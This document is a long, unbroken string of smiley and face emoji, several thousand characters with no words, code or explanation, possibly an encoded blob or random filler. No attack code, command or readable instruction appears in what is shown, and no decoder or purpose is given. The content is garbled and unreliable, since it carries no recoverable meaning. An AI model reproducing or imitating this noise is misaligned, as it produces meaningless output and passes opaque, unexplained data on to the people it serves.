🤪😜😆😅😃😃🙃😇😄😊😊😉😊😀😁🙃😝😆😅😊😆😊😆😅🤣😊😅😀🤪😃😁🤣😝😃😅😝😁😇😜😃😄😃😉😉😁🙃😇🙂🙃😇😅😇😝😉😂😄😀😂🙃😅😂🙂😆🤣😇😜😅🤪🤪😝😊😜😅😃😀😇🙂😉😄😅😉😇😇😝😂😆😁🙂😅😀😂😃😃🙃😅😆😄😁😀😇🤪😀😂🤣😜😊🙂😉😃🙃🤪😜🙃😇😁😉😉🙂😆🙃🤪😅😂🙂😜😉🙂😁😃😆😀😅😝😀😅😇🤪😊😂😉😅🙃😀🤪😂😂🤪😉😆🙂😝😆🤣😁😜😄🤪😜😂😅😃🤣😇😁😇😂🤣😊😀😊😇😉😝🙃😂🙃😇😁🤪😅🙃🙃🤣😜🤪🙂🤪😊😁😀😁😆😜😁😊😀🤪😝😉😀😜😃😅🙃😂😇😁😂😀😄😆😃🙃😉😜😆😀🙃😅😉😅😂😊🤣😁😜😜😃🙃😊😂😜😂🙃😃😃😝😜🤣🙂😜😂🙂🤣😅🤣😀😂😉😂😄😊😇😀😆🤪🤣🤣🙃🙂😄🤣😊😅😆😆😝😁🤣😄😁😃😄🤣😁😇😀😅🙃😆😄😁😊😄😆😃😝😀😆😜😄😝🙂😀😃😝🙃😊😄😉😊🙃🙃😉😁😇😝🤣🤣😃🤪😝😂🤣😀😁😉😅😄😅😊😁😁😃🤪😃🤣😊😜😝😂😊😃😀🙃😝🙂🤪😅😇🤪😅😂😆😀😁😀😂🙂😜😄😀😉😀😁😃😇🙂😊😄😇😅😉😊😁😆😀😂😁🤪😝😃😁🙂😉😄🙂🙃🙂😇😃😃😉😀😄😜😀😆😊🤣😆🤪😝😀😆😝🤪🤪🙂😉😃😝🙃😊😁😂😊🙂🙂🙂😃🙂🤣😂😉😜😝🙂🤪😊🙃😁😀😉🙂🤪😜😆🙃🙂😁🙂😜😂😀🤣😉🤣😜😀🙃😄🙃🤣😜😅🙂😀😀😜🙃🤪😉😆😃😝😊😆😆🤪😜🤪😁😜😝😂😊😂😀😆😁😆🤣😁🙃😅😉😃🙃😉😜😜🙂🤪😃😝😉😇😆😁😇😉😅😉🤪🙂😂😂😀🤣🙃😅😄😆😝😁😆😄😝😃🤣😃🤪😜😂😜😀😝😉😀😄😊😊😉😆🙃😝🙂🤣🙃😜🤣🙂😅😃😆😉😁😁😄😝😁😅😀😝😜😂😃😜😝🙃😀😃😊😉😉😁🙃🤪🙂😅😂🤪🤣😂🙂😀😆🙃🤣😄😄😊🙃😆😀🤪😃😅🤪🤪😝🙂😀😀😊😉😅😄🙃😊🙂😆😂🤪🙂🤣😅😜😆🙂🙂😃😄😊🙂😁😀😊😜😆🤪🤪😜🤣😇😜😊🙃😀😃🙃😊😄😁😂😇🤣😅😅😜🤣😂😁😀😄🙃🙂😄😀😊😃😁🤪😇😝😅😇😜😝😂😉😀🙃😉😀😄😂😇😄😆😅😝😆🤣😁😀😆🙂😃😃😀😉🙂😄🤪😝😄😆😇😝😊🤣😉😀😊🙂🙂😃😂😊😀😁😅😝🙂😅😁🤪😄😂😃😃😄🙂😜😃🤪😊🙂😁😇😝😉😅😉🤪🙃😂🙂😃🙃🙃🤣😄😅😇😀😆😁🤪😆🤣😃😜😀😂😜😄😀🙃😝😄😇😇🙂😆😉🤪😄🤣🙂😜😂🙂🤣😄😂😉😆😁😁😝😀😅😃🤪😅🤣😜😜🤪🙂😝😄🤪😉😊😁😉😝🙂😅🙂🤪🙃😂🤣😀😅🙃😆😄😁😊😄😆😃😝😁😅😜😜😝😂😝😀🤪🙃😊😁😉😊🙃😆🙂😝🙃🤣🤣😜🙃🙂😆😃🤣😉😄😁😃😇😀😆😜🤪😀🤣😝😜😇🙂😊😃😊😉🙃🤣🙂😇😂😅🤣🤪😂😂😆😃😄🙃😄😄🙂😊😀😅😃😇🤪😅😝🤪😜😂😊😀😊🙃🙃😄🙂😊😂🤣🤣😝😅🤣😆😜🤣🙂😄😃😆😉😀😁😅😊🤪😅😜😝😇🤣😊😜😜🙂🙃😄🙂😉😂😁🤣😇😅😅😆🤪😁😂😄😀😆🙃😀😄😆😉🤪😁😜😇😇😂😊🤪😉😂🙃😀😊🙃😂😄🙃😊😅😆😂😝😁🙂😄😜😃🙂😀😃😄🙃🤪😁😀😊😇😅🙂😝😉🙂🙃😜🙂🙂😂😃🙃😉😅😁😂😇😁🤣😅🤪😃🙂😄😜😜🙂🤪😄😄😉😇😆😇😇😉😅🙃🤪🙂😂😂😀🤣🙃😅😄😉😊😁😆😆😝😃🤣😀🤪😜😂🤪😀😝🙃😇😁😀😊😉😆😜😝🙂🤣😂😜🤣🙂😅😃😆😉😁😁😅😇😃😅😀😝😜🤣😜😜😝🙃🤪😃😊😉😉😁😇😇🙂🤣😝🤪🤣😂😅😀😆😉😅😄😄😊😃😆😆😇😜🤣😇🤪😝😂😇😀😊🙃😉😄🙃😊🙂😆😉😝🤣🤣😂😜😆🙂😆😃😄😉😃😁😀😊😜😅😃😝😝🤣😇😜😊🙂😉😃🙃😊😉😁😂😇🤣😅🙃🤪😆😂😂😀😄🙃😃😄😀😇😜😁🤪😇😝🤣😀🤪😊😂🤪😀🙃😉😀😄😂😊🤣😆😅😝😆🤣🙂😜😄🙂😄😃😀🙃😜😄🤪😊😝😆😇😝😊🤣🤪😜🙃🙂😉😃😂😉🙂😁😅😝😆😅😁🤪😄😂😆😀😀🙃😁😃🤪😊😃😁😇😇😊😅😉🤪🙃😂🙂😀😂🙃😂😄😅😊😆😆😁😝😄🤣😃😜😀😂😜😀😜😉😊😄😇😊😊😆😉🤣😜🤣🤪😜😂🙂🤣😃😅😄😊😄😀😀😅🤪😃😄😜😃🤣😜🤣🙂😜😃😇😉😊😁😉😃🙂😇😁😉😝😂🤣😀😅🙃😆😄😁😊😄😆😃🤪😆🙃😜🤪🤣🙂😂😀😇🙃😊😄😉😀😀😉😝😆😊😊🤣🤣😃🤪😅🙂😇😀😂😉😁😁😁😊😆🤪🙃🤣😝😜😇🙂😊🤣🙃😀😜🙂🤪😁😀😉🤣😁😝😂😅😁😄😇🤪🤣😂🙃😝😉😆😝😆😅😝🤪😇😂😊😜😄😃😝😊😉😂😇😃😆😉😉😇🙂😜😁🙂😄😃😃😉😀😄😜😁🤪🙃😉😃😇😁😄😀😄🙂🙃😃🙂😉😂😂🤪😄🙂😉🤣😄😝😊😊😅😉🤪🙂🤣😉🤪😄😆😃😇😇😅😊🤪😉🤪😀🤣🙃😀😆🙂😊😉😝😅😀😝😁🤣😄😜😃😇🤪😂🤪😃😄🙃🤣😄😄😊😆😁😝😇😉🤣😇😜😀🙂😅😃😁😄😇😇😉😅😄🤪😃😂😀😆😜😜😉😂🤪😄😅😉😀😁😇😇😇😆😝😂😊😀🤣🙃😅😄😆😀😃😉😁😁🤪😇😅😜😄🙂😁😀😝🙃😇😄😊😄😉😉😉😆😃😝🙃🤣🙃😆😇😄😀😉😁😁😄😇😃🙃😝😃😄🤣😊😊😆😀😅😅😇😉😉😜😇🤣😁😉😇😀🤣😅🙃😄😆🙃😁😄😄😊😃😅😄😂😁😅🤪🤪🤪😂😇😃🙂🙃😉😄🙃😊🙂😅🙃😝🤣🤣😅😜🤣🙂😁😃😊😉😃😁😀😊😜🤣🤪😝😝🤣😇😜😝🙂😉😃😊😉🙂😆😄😇🤣😂😅🤪😆😂😁😀😆🙃😃😄😄😉😜😆😄😇😝😅😇🤪😊😂😉😀😊🙃🙂😄😉😊🤣😆😅😝😆🤣😁😜😄🙂😃😃😃🙃😜😄🤪😊😝😆😜😝😊🤣🤪😜🙃🙂🙂😃😂😉🤣😅😄😇😆😅😆🤪😄🙃😃🤪😜🙂😜😄😆😉😝😆😃😇😊🤣🤣🤪🙃😂🤪😀😇🙃🤣😄😊😊😆😆🤪😝😄🤣😄😜😀😂😜😀🤪😉😃😁🤪😊😊😆😉😝🙃😂😁😜😂🙂😂😃😅😉🙂😆😅😇😄😅😃🤪😀🙂😇😜🤪🙂🤪😃😇😉😊😄😝😇🙃😅😝🤪😂😂🤣😀😅🙃😆😄😁😊😄😊😉😝😀🤣😅🤪🤪😂🤪😀😇🙃😊😄😉😝🙃😆🙂😝😂🤣😇😜😅🙂😉😃😁😉😇😁😃😝😄😆😜😝🤪😂😅😜😇🙃😁😃😉😉🙃😁🙂😝🙃😅🤣🤪😅😂😝😀😁😉😀😄😃😊😀😁😜🤪😀😅😝🤪😇🙂😅😀😉🙃😉😄🙂😊😂😆🤣🤪😂🤣😆😜😁🙂😝😃😃😉😂😄😜😊🤪😆😝😝😇🤣😊😜😉🙃😃😃🙂😊😄😁🤣😇😂😅😆😜😅😂😄😀😃🙃🙃😃😜😊🤣😁😝😇😇😅😊😜😇😂🙃😀🙂😉😃😄🤣😊😉😆😆😝😁🤣😄😀😁🙂😀😀😜😉🙃😄😝😇😄😆😊😝😉🤣🙃😀😉🙂😂😃🤣😊😃😁😆😇🤣😅😄🤪😃😂😀😜😜🙂🤪😃😝😊😅😁😊😝🤣😅🙃🤪😉😂😂😀🤣🙃😅😄😆😊😝😆😄😝😃🤣😀🤪😜😂🤪😄😝🙃😇😄😊😇😆😆🙃🤪😄🤣😂😀😄🙂😅😃😆😉😁😁😄😇😉😅😀🤪🙂🤣🤪😀😂🙂😇😄😝😉😉😁🙃😝😄😅😂🤪🙂😂😅😀😆🙃😁😄😄😊😃😆😀😝😅😅🤪😜😂😂😇😀😇🙃😉😄😜🤣🤪😆😂😝😂🤣😅😜😊🙂😁😃😁😉😃😁😄😊😜😅😄🤪😜🤣😇😜😊🙂😉😄😀😉🙂😁🙂😇🤣😅😅😂😇😂😁😀😄🙃😃😄😃😉😜😁🤪😇😝😅😇🤪😊😂😉😀🙃🙃🙃😁😊😊🤣😆😅😝😆😅😉🙂😇😃😉😉🙃😁🙂😇😂😅🤣😅😅😃😊😀😀😜😇🙂🙂😃😂😉🤣🙂😄😄😅😇😁🤪😆🙂🤪😀😀🙂😜😂🤪😆😅😊🤪😃🙂😃😉😂😜😂😊😀😂🙃🤣😄😅😄😄😉🙂😆🙃🤣😆😜😆😂😜😀🤪🙃😝🙃😁😃😇😊😂😁🤪🤣😊😀😆🙂🤣😃😅😉😆😂🙂😁😀😊😅😁😆😝😆🤣😉😜😄🙂😇😃😉😉😇😁😝😊😝😅🙃😁😇🙃😜😄😝😊😇😆😊😝😉🤣🙃😄🙂😄😝🤪😃😜😊🙃😉😄🙃🙃🙂😝😆😊🤣😅😀😁😆😆😉😜😄😉😃😁😀🙃😜🙃😄😅🙂😇😝😊😇😅😃😁😊😉🙃😁🙂🤪😂😁😄😊😊🤪😅😇😁😄🙂😄😉😊😀😁😜😇🤪😊😆😅😊🤪😝😂😅😀😇🙃🙂😃🙂😉🙃😁😉😜🙃😇😂🙂😃😃😀😃😜🙂🙃😜😄🙃😊🙃😇😁😄😀😃🙂🙃😃🙂😉😂😉😉😁😇😊🙃😆🙂🤪😀😅😅😀😀😅😁😊😄😁😝😇😇😅😊🤣😃😝😉😂😃😀😊😄🤣😊😅😁😊😝😁🤣😄😜😃🙂😀😀😜🙃🤪😃😝😜😊😉😜😁😝🤣🙃😜🙂🤪😂😃🤣😝😝🙃😅🙂😁😆🙃😂😊😀🙃🙃🙂😄😂😊🤣😆😅😃😆😀🙃😊🤪🤪😜😂😂😀🤣🙃😅😂😁😃😅😉😇😁🤣😇😁🤣😁😜😃😃😀😉😄😄😊😊😉😆🙃😃😊😉😝🤣🙂🤪🤣🙂😃😀🙂🤣😆😇😃😅😀😝😜🤣🤪😆😝🙂😇😃😇😉😉😁🙃😇🙂😅😂🤪🤣😂😊😁😃🙃😁😄😁😊😃😆😆😇😜😅😜🤪😝😂😝😀😊🙃🤪😁😊😊🙂😆😂😝🤣🤣🙃😜😆🙂😆😃😄😉😅😆😄😊😜😆🤪😝😝🙃😝😜😊🙂😊😃🙃😊😉😀😂😇🤣😅😂🤪😆🙂😃😀😄🙃😃😄😀😉😜😉😇😇😝😅🤪🤪😊😂😊😀🙃🙃😉😄😂😊😇😀😇😝😆🤣😅😜😄😊😄😃😀😉😀😄🤪😊😝😆😇😝😜😂😇😜🙃🙂🙂😃😂😝😂😁😅😇😅😅😁😜😆😆😃😀😀🙃😃😃🤪😊😊😁😇😇😊😅😉🤪🙃🙂😊😀😂🙃🙂😄😅😊😅😆😁😝😁🤣😃😀😄😂😜😀🤪🙃😜😄😇😇🙂😆😉😝🙃🤣🙂😀🙃🙂🤣😃😅😉😂😁😁😝🤣😅😃🤪😀🤣😜😃🤪🙂😝😃😇😉🤪😁😉😇😇😅🙂🤪😊😂🤣😃😂🙃😆😄😁😊🤣😆😃😝😇😅😜🤪🤪😂😝😃🤪🙃😊😄😉😊🤪😆🙂🤪🙂🤣🤣😜😅🙂😆😄😅😉😄😁😃😇🤣😆😜🤪🤣🤣😝😜😇🙂😊😃😉😉🙃😁🙂😇😉😅🤣🤪😊😂😆😀😅🙃😄😁😁😊😀😁😜😝😄😅😝😜🤪😂😊😀😉🙃🙃😄🙂😊😂😆🤣😝😂🤣😆😜😂🙂😄😃😄😉😀😆😃😊🤪😆😝😝🤪🤣😊😀🙂🙂🙃😃🙂😉😂😆🙂😇😅😅😆🤪🤣😂😄😃😃🙃😀😃😜😉🤪😁😝😇😇😅😊🤪😇😂🙃😀😉🙃😂😄😂😊😅😅🤣😝😁🤣😄😜😁🙂😀😃😇🙃🤪😄😝😊😇😅😝😝😉🤣🙃😜😊🙂😂😄😉😉😅😁😆😇😁😂😄🤪😃😂😀😀😄🙂🤪😄😀😉😇😁😜😇😉🤣😊🤪🙂😂😂😀😉🙃😅😄😂😊😁😆😄😝😃😂😄🤪😜😂🤪😃😄🙃😇😁😆😊😉😆🙃😝🙂😂🙃😜🤣🙂😅😃😉😉😁😁😇😇😃😅😀😝😜🤣🤪😜😝🙂😇😃🤪😉😉😁😜😇🙂😅🙃🤪🤣🙂😂😀😆🙃😁😄🤣😊😃😅😄😇😜😅🤪🤪😝😂😇😀😊🙃😉😄😊😊🙂😆😊😝🤣🤣🤣😜😆🙃😅😃😄😉😃😁😄😊😜😅😇😝😝🤣😇😜😊🙃😇😃🙃😉🙂😁😉😇🤣😅🤣🤪😆😂😁😀😄🙃😃😄😀😉😜😆😀😇😝😅🤪🤪😊😂😊😀🙃😉😉😄😂😊🤣😆😂😝😆😂😀😜😄🙂😃😃😀😊😃😄🤪😊😝😆😜😝😊🤣😜😜🙃🙂🙂😃😂😇🤣😁😅😇😆😅🤣🤪😄😂😆😀😀🙃😉😃🤪😇😝😁😇😇😊😅😝🤪🙃😂😊😀😂😉🙃😄😅😝😆😆😁😝😄🤣😆😜😀🙂😄😀🤪🙃😜😄😇😝😊😆😉😝🙃🤣😊😜😂🙂🙃😃😅😉😉😁😁🤪😄😅😃🤪😀😂😄😜🤪🙃😀😃😇😊😜😁😉😝😊😅🙂🤪😂😂😉😀😅🙃😊😄😁😊😄😆😃😝😀😅😜🤪🤪😂😜😀😇🙃😜😄😉😊😉😆🙂🤪🙃🤣🤣😜😅🙂🤣😃😁😊😀😁😃😇😀😆😜😜😀🤣😝😜😇🙂🤪😃😉😊🙃😁🙂😇😂😅🤣🤪😅😂😆😀😁🙃😆😄😃😊😄😁😜😇😜😅😝😃😄😂😊😀😉🙃😉😄🙂😊😜😆🤣😝🤣🤣😆😀😄🙂😄😃😅😊😄😄😜😊🤪😆😝🤪😆🤣😊😜😊🙂🙃😃😇😊🙃😁🤣😇😅😅😆🤪😂😂😄😀😄🙃😀😃😜😆🤣😁😝😇😇😅😊🤪😊😂🙃😀🙂🙃😂😄🤣😊😅😆😆😝😁🤣😁😀😅🙂😀😀😜🙃🤪😜😆😇😀😆😊😝😉🤣🙃😅😜🤪🙂🙂😁😀😉😜😊😇🙃😅😄🤪😃😂😀😆😄😝😆🙂😜😀😝😉🙂😄😜🙂😝😜😁😂😂😀🤣🙃😅🤣🙃😃😆😊😅😁😉😇🤪😅🤣😝😃🙂😃😃😅🙃😂😃😜😆😇🤪😀🤣😂😜🤣🙂😅😅😇😀🤣🙂😆😀😊🙃🙃😁🙂😇🤣😆🙂😇😀😄😂😉😉😁🙃😇🙂😉😉😀😄😄😅😅😉🙃🙂😊😄😜🙃😁😊😂😆🙃😇😇😊😀😄😀😁😉😀😄🙃😊🙂😆😂😃🙃😝😂😅🙃🤪😆🙂🤣😀🤣😁😁😇🙃😆🤪😝😝🤣😇😆😄🤪😜🙂😝😜😊🙃😇😁🙂😇😊😆😝😝🤣🤣😂😄😂😄😆😉😜😁🤪😇😝😉😃😅🙃🤪😜😂🤣🙃😊😁😄😊🤣😆😅😝😆😉🤪😅🤣😇😜😅😄🤪😄😆😊🤪😇🤣🤣😀😁😂😆😀🤣😆😜😃🤪😉🤣😁😅😇😆😉😁😆🤪😝😄😂🙃😜😆🙃😀😄😀😁😆😝😃😅😉🤪🙃😂🙂😅😁😜😜🙃😁😃🙃😉😆😆😆😜😂😜🙃😂😜😀🤪🙃😝🤣😜😄😁😉😊😆😊😇🙃😅😉😜😉😂😉😃🤣😇🙃😇😅😅😃🤪😀🤣😜🤣😇😜😄🙃😁😝😜😆😀😇🙃😅🙂🤪😂🤣🙃😜😄🙃😊🙃😅😅🤣😃😄🙃😂🤣😁🤪🤪😂😝😀😇🤪😊🙃🤣😃😉😇😃😀😊😂🤣😜😅🙂😆😃😁🤪😉😉🤣😄😝😊😀😆😇😝😇🤣😅🤪😜🤣😇😃🙂😉😂😁😊😉🤣😆🤣🤪🤣😂😂😜🤣😄😃😊😀😁😜😇🤪😅😝🤣😇😝😃😆😉🙃😀😄🙂😊😂😆🤣😝😅🤣😆😜😁😉🤣😅😃😉😁😁🙂😊🤪😆😝😝😇😊😜😂😃🤪🤪😂😝😃😅😂😜😁😁😊😉😅😄😉🤣😀😂🙃😀😃😜😉🤪🤪😁😂😇😅😆😇😁😜😄🤣😊😊😉😄🤣😊😅😆😆🤪😅🙂🙃😜😃🙂😁😀😜🙃😜😄😝😊😇😆😊😜😉🤣🙃😜🙂🙂😉😃🤣😉🙂😁😆😇😉😅😄😜😁😂😀😜😜🙃😁😃😝😊😀😁😊😇😉😅🙃😜😉😂😂😀🤣🙃😊😄😆😊🙂😆😄😝😃🤣😀😀😃😂🤪😀😝😉😁😄😊😇🤪😆🙃😝🙂🤣😂😀🙂🙂😅😃😆😉😊😁😄😝😄😅😀😝😜🤣🤪😜😝🙂😇😃😊😉😜😁🙃😝😀😅😂🤪🙂😂😅😀😆🙃😁😄😄😊😆😆😀😝😆😅🤪🤪😜😂😇😃😝🙃😉😄🙃😊😇😆😂🤪🙃🤣😅😜😆🙂😁😁😄😉😃😁😀😇😁😆🤪🤪😃🤣😇😀🙂🙂😉😃🙃😉🙂😁😂😇😊😅😅🤪😅😂😁😀😄🙃😃😁😄😉😜😁🤪😝😁😅😇😜😁😂😉😀🙃🙃🙂😆😂😊🤣😆😅😝😉🤣😁😜🙂🙂😃😃😁🙃😜😆🤪😊😝😆😇🤪😃🤣😉😜😜🙂🙂😄😄😉🤣😁😅😇😆😅😁🤪🤣😂😃😀🤣🙂😜😄😀😉😝😅😇😇😊😅😉🤪🤪😂🙂😀😉🙃🤣😄😊😊😆😅😅😝😄🤣😃😜😂😂😜😀😜🙃😝😄😇😊😊🤣😉😝🙃🤣🙂😜🤪🙂🤣😃😇😉😆😁😉😇😄🤣😁🤪😀🤣😜😀😂🙂😝😄🤣😉😊😁😉😇🙃😅🙂🤪😂😂🤣😀😇🙃😆😄😇😊😄😆😁😝😀😂😃🤪🤪😂😝😃😆🙃😊😄🤪😊🙃😆🙂😝😂😂🙂😜😅🙂😆😃😇😉😄😁😉😇😀😆😜😝🤪😂😜😜😇🙂😊😄😆😉🙃😆🤣😇😂😅🤣🤪😅🙂🤣😀😁🙃😄😄😇😊😀😅😃😇🤪😅😝🤪😇😂😊😀😉🙃🙃😁😀😊😂😅😃😝😅🤣🤣😜😁🙂😄😃😃😉😀😁🤣😊🤪😅😆😝😇😂😁😜😉😉🙃😃🙂😉😂😁😝😇😅😅😊🤪😁😂🤪😀😃😊😀😃😜😉🤪😆😆😇😇🤣😄🤪😉🙂🙃😀🙂🙃😂😄🤣😊😅😆😇😝😁🤣🤣😜😃🙂😀😀😜🙃🤪😄😝😊😇😅😆😝😉🤣🙃😜🙂🙂🙂😃🤣😊😅😁😆😇😁😅😊🤪😃😂😄😜😜🙂🤪😃😝😉😇😁😊😇😉😅🤪🤪🙂🙂😀😀🤣🙃😂😄😆😝😁😆😄😝😃🤣🤣🤪😜🙂😁😀😝😉😊😄😊😊😉😆🙃😝🙂🤣😝😜🤣🙂😂😃😆😉😆😁😄😇😃😅😀😝😜🤣🤪😜😝🙂😝😃😊😉😉😁🙃😇🙂😅😂🤪🤣😂😅😀😂🙃😉😄😄😊😃😆😀🙃🤣🤣🤣🤪😝😂😇😀😊🤪😄🙂😇😀😉🙃😃😃😜😊🤪😆😇😇🤪😆🤣😉😇😁😀😊😜😆🤪😆😊😝😃😂😄🤪😝😂😇😃😆😉🤣😁🙃😇😉😅🤣😝🙂😀😅🙃😜😄😀😉😜😁🤪😁😅😇😊😅😉🤪😅😂🤣😜😝🙃😊😃😂😊😄😁🙃😝😂😅😉😜😀😂😆🙃😂😁😆😊😝😆😇😝😊😀😅😉😆🤣😄🙃🤪😆😁😜😇😄🙃😅😝🤪😄😂😃😀😀🤪😝😁😂🙃😀😇😝😄😁🤣😅😉😝😜😅😆😉🙃😆😃😝😊🙂😆😁😝😄🤣😃😅😂🤪😀😂😊😀😄😇😃😊😊😆😉😝🙃🤣🙂😜😂😇🤣🤣🤣🤪😆😆😃😇😄😅😃🤪😀🙂😃😜😜🙂😝😃🤪😉😊😁😝😇🙃😅🙂🤪😂🙂🙂😀😅🙃😆😄🤣😊😄😆😂😝😀😅😜🤪🤪🙂😜😀😇🙃😊😄🤪😊🙃😆🙃😝😂🤣🤣😜😅🙃🤣😃😁😉😄😁🤣😇😀😅😆😝🤪🤣😝😜😇🙃😝😃😉😉🙃😁🤪😇😂😅😉🤪😅😂😆😀😁😉😆😄😃😊😀😆🤣😇🤪🤣😆🤪😇😂😊😀😉🙃🙃😄🙂😊😂😆😉😝😅🤣😊😜😁🙂😆😃😃😊😄😄😜😊🤪😅😄😝😇🤣😝😜😉🙂🙃😃🙂😉😝🙂😄😇😅😅😉🤪😁😂😄😀😃🙃😃😃😜😉😜😁😝😇😇😜🙂🤪😉😂🙃😀🙂🙃🙂😄🤣😊😅😆😆😝😁😃😁😜😃🙂😅😀😜😉😆😄😝😊😇😆😊😝😉😇🙂😜🙂🙂🙃😃🤣😉😅😁😆😇😅😅😄🤪😃😇😀😜😜🙂😜😃😝😉🤪😁😊😇😉😅🙃🤪🙂😀😜😀🤣🙃😅😄😆😊😆😆😄😝😃🤣😀😜😀😂🤪😀😝🙃😇😁🤣😊😉😆🙃😝🙂🤣😉😜😇🙂😅😃😆😉😁😜😝😁😇😆😂🙂😀😇😊🤣🤣😅😁😄😃😉😉😁🙃😇🙂😅😉😅😂😉😝😉😂😝😇😀😝🤪😅😆🙂😇😜😅🤪🤪😝😇😆🤣🤪🤪😇😂😁😀😃😉😀😄🤪😊😀🙂😉🙂😝😃😄😉😃😁😀😀😆🙃😀😀😄😅🤪😊😅😁😀😉🤣😃😁🤣😊🤪😃😆😇🤪😆😂😁😀😄🙃😃😄😀😉😜🙂😃😀😝😅😆🤪😜😂😉😀🙃🙃🙂🙃🤪😃😂😉🤪😆🙂🤣🤣😀😁🙂😃😃😀🙃😜🙃😅😄😄😇😀😆🙃😇😊🤣🤣🤪😝😂😉😀😂😉😃😁😀😇😀😆😂🤪😅🤣🙂😜🤪🙂😄😊😀😆😀😇😊😅😉🤪🙃😊😝😀😝😆😝🙂😄🤪😂😆😁😝😄🤣😃😜😀😂😜😀🤪🙂😝🤣😊🤪🤪😆😉😝🙃🤣🙂😇😂😀🤪😝🙂😉😆😂😅😊🙃😅😃🤪😀🤣😜😜🤪🙂😝🙃😇😀😃😂😉🤪🙂😅🙂🤪😂😂🤣😀😅😁😂😄😁😊😆😆😃😝😀😅😜🤪🤪😂😝😀😇😂😁😄😉😊😇😆🙂😝😂🤣🤣😜😅🙂😆😃😁😆😀😁😃😇😄😆😜😝🤪🤣😝😜😝🙂😊😄😇😂🙃😁🙂😇😉😅🤣🤪😇😂😆😀😁🙃😄😄😃😇😜😁😜😝😃😅😝🤪😝😂😊😀😇🙃🙃😁😉😊😂😆🤣😝🙃🤣😆😜🤣🙂😄😃😃😉😀😆😃😊🤪😆😝🤪😃🤣😊😜🤪🙂🙃😃🙂😉😂😆🙂😇😅😅😆🤪🙃😂😄😀😄🙃😀😃😜😉🤪😆😜😇😇😅😊😜😃😂🙃😀😝🙃😂😄🤣😊😅😆😆😝😁🤣😄😜😅🙂😀😃🤣🙃🤪😄😜😊😇😅😃😝😉🤣🙃😜😊🙂😂😄😁😉😅😁😅😇😁😅🤣🤪😃😂😆😃😃🙂🤪😃😝😉😇😆🙂😇😉😅😉🤪🙂😂😊😃🙂🙃😅😄😆😊😁😅😊😝😃🤣😃🤪😜🙃🤪😜😇🙃😇😄😜😊😉😆😊😝🙂😂😀😜🤣🙃😂🤣😃😉😁😁😂😇😃😅😁😝😜🤣🤪😜😝🙃🤪😃😊😉😉😁😜😇🙂😅😜🤪🤣😂😅😀😆😉😅😄😄😊😃😆😂😇😜🤣😀🤪😝😂😇😀😊😉😇😄🙃😊🙂😆😜😝🤣😂😀😜😆🙂😁😃😄😉😃😁😀😊😜😅😁😝😝😂😆😜😊🙂😇😃🙃😉🤪😁😂😇🤣😅🙃🤪😆🙂😇😀😄🙃😄😄😀😊😆😁🤪😝😃🤣🤪🤪😊😂😉😀🙃😊😃😄😂😊😂😆😅🤪🤣😁😁😜😄🙂😅😃😀😉😅😄🤪😊😝😆😇🤪😝😊😄😜🙃🙂😝😃😂😊😀😁😅😇😆😅😁🤪😄😆😀😀😀🙃😁😃🤪😊😄😁😇😇😊😅😉🤪🙃🤣😜😀😂🙃😉😄😅😊😆😆😁😝😄🤣😃😜😀😜😂😀🤪😉😃😄😇😊😊😆😉😝🙃🤣🙂😜😂🤪😉😃😅😉🙃😁😁😇😄😅😃🤪😀🤣😜😜🤪🙂😝😃😇😊😃😁😉😇🙃😅🙂🤪😂😂🤣😀😅🙃😆😄😁😊🤣😆😃😝😀😅😜🤪🤪😂😝😀😇🙃😊😄😉😊😝😆🙂😝😂🤣🤣😜😅🙂😆😃😁😉😄😁😃😇😀😆😜😝😜🤣😝😜😇🙂😊😃😉😉🙃😁🙂😇😂😅😂🤪🤣😂😆😀😁🙃😄😄😃😊😄😁😜😇🤪😅😝🤪😇😜😁😀😉🙃🙃😄🙂😊😂😆🤣😝😅🤣😆😜😁😃😉😃😃😉😀😄😜😊😜😆😝😝😇🤣😊😜😉🙂🙃😃🙂😉😂😁😂😇😝😅😆🤪😁😂😄😁😅😉😀😃😜😉🤪😁😝😃😆😝😀😅😂😝😉😂🤣😀🤣🙂😜😃🙃🙃🤣😆😄😝😃🤣😅😝😀😂😀😃😀😉😃🤪😜😆😊😝😉🤣🙃😜🙂🙂😂😃🤣😉😝😂😆😊😊😅🙂🤪😃😂😀😜😜😝😃🤣😁😃🤪🙃😇😁😂😊🤪😃😇😂😉😀🤣🙃😅😄😆😄😃😉😂😆🙂🙃😆😜🙂😂🤪😀😝🙃😇🤣🤪😄😄😉😉😆😉😇🙂😅🙃😜🙃😂🙃😃😅😁😄😇😄😆🙂🤪😁🤣🤪😜😝🙂😇🙃😄😀😊😉😄😁😇😅🙃🤪🤣😂😅😀😆🙃😁😄😄😊😃😆😀😇😜😂😄🤪😝😂😇😀😊😇😀😊😊😊🙂😆😂😝🤣🤣🙂😜😆🙂😆😃😄😉😂😁😀😇😁🤣😀😝😝🤣😇😜😊🙂😝😃🙃😉🙃😁😂😇😉🤣😂🤪😆😂😁😀😄😉😆😄😀😊😀😁🤪😝😜😄😇🤪😊😂😊😀🙃🙃😜😄😂😊🤣😆😅😝😆🙃😊😜😄🙂😄😃😀😉😀😄🤪😊🤪😆😇😝😊🤣😉😜🙃🙂🙃😃😂😉🤣😁😅😇😆😅😁🤪😄😂😃😀😀🙃😃😃🤪😉🤪😁😇😇😊😅😉😀🙃😂🙂😀😂🙃🙂😄😅😊🤣😆😁😝😂🤣😃😃😀😂😜😀🤪🙃😜😄😇😊😝😆😉😝😉🤣🙂😃😂🙂🤣😃😅😉🤣😁😁😇😆😅😃🤪😁🤣😜😃😀🙂😝😃😇😉🤪😁😉😇😇😅🙂🤪😂😂🤣😄😅🙃😆😄😁😊😅😆😃😝😁😅😜😜😄😂😝😃🤪🙃😊😄😉😊😝😆🙂😝😜🤣🤣😜😅🙂😆😄😅😉😄😁😃😇😅😆😜🤪🤣🤣😝😜😇🙂😊😄😇😉🙃😁🙂😇😝😅🤣🤪😂😂😆😀😁🙃😄😄😃😊😀😁😜😝😃😅😝😜😄😂😊😀😇🙃🙃😄🙂😊😂😆🤣😝😂🤣😆😜😅🙂😄😃😆😉😀😁😜😊🤪😆😝😝😝🤣😊😜😝🙂🙃😃😉😉😂😁😉😇😅😅😆🤪😁😂😄😀😃🙃😀😄😀😉🤪😁😝🤣😆😅😊🤪😉😂🙃😀🙃🙃😂😄🤣😊😅😆😆😝😁🤣😄😜😃🙂😃😃😀🙃🤪😄😝😊😇😆🤪😝😜🤣🙃😜🙂🙂😂🙂🤣😀🙂🙃😅😄😜😊🤪🤪🤣😂😀😜😜🙂🤪😄😜😂😇😁😊😇😊😅🙃🤪🙃😂😂😀🤣🙃😅😄😉😜😜😆😄😝😁🤣😀🤪😜😂🤪😀🤪🙃😇😄😇